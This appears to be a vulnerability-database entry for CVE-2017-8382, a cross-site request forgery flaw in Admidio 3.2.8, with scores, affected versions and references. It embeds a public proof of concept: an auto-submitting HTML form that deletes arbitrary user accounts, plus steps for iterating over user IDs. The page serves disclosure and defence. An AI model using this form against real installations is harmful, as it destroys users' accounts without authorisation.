CVE-2017-8382
medium
CVSS v3
4.5
CVSS v4 NEW
โ
VIR risk
5.5
Description
admidio CSRF Vulnerability
Predictions
Exploit likelihood
55%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Admidio 3.2.8 - Cross-Site Request Forgery
# Exploit Title :Admidio 3.2.8 (CSRF to Delete Users)
# Date: 28/April/2017
# Exploit Author: Faiz Ahmed Zaidi Organization: Provensec LLC Website:
http://provensec.com/
# Vendor Homepage: https://www.admidio.org/
# Software Link: https://www.admidio.org/download.php
# Version: 3.2.8
# Tested on: Windows 10 (Xampp)
# CVE : CVE-2017-8382
[Suggested description]
Admidio 3.2.8 has CSRF in
adm_program/modules/members/members_function.php with
an impact of deleting arbitrary user accounts.
------------------------------------------
[Additional Information]
Using this crafted html form we are able to delete any user with
admin/user privilege.
<html>
<body onload="javascript:document.forms[0].submit()">
<form
action="http://localhost/newadmidio/admidio-3.2.8/adm_program/modules/members/members_function.php">
<input type="hidden" name="usr_id" value='9' />
<input type="hidden" name="mode" value="3" />
</form>
</body>
</html>
[Affected Component]
http://localhost/newadmidio/admidio-3.2.8/adm_program/modules/members/members_function.php
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Escalation of Privileges]
true
------------------------------------------
[Attack Vectors]
Steps:
1.) If an user with admin privilege opens a crafted
html/JPEG(Image),then both the admin and users with user privilege
which are mentioned by the user id (as like shown below) in the
crafted request are deleted.
<input type="hidden" name="usr_id" value='3' />
2.) In admidio by default the userid starts from '0',
'1' for system '2' for users, so an attacker
can start from '2' upto 'n' users.
3.)For deleting the user permanently we select 'mode=3'(as like shown
below),then all admin/low privileged users are deleted.
<input type="hidden" name="mode" value="3" />
------------------------------------------
[Reference]
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
Thanks
Faiz Ahmed ZaidiPackage impact
| Ecosystem | Package | Vulnerable | Fixed |
|---|---|---|---|
| Packagist | admidio/admidio | <4.1-Beta.1 | 4.1-Beta.1 |
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| admidio | admidio | 3.2.8 | |
References
- http://en.0day.today/exploit/27771
- https://github.com/Admidio/admidio/issues/612
- https://github.com/faizzaidi/Admidio-3.2.8-CSRF-POC-by-Provensec-llc
- https://www.exploit-db.com/exploits/42005/
- https://nvd.nist.gov/vuln/detail/CVE-2017-8382
- https://github.com/Admidio/admidio/pull/1074
- https://github.com/Admidio/admidio/commit/a7ac9d3c9e0780e877fe9ac846ac64b284de8553
- https://github.com/Admidio/admidio
- https://www.exploit-db.com/exploits/42005
CWEs
CWE-352
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.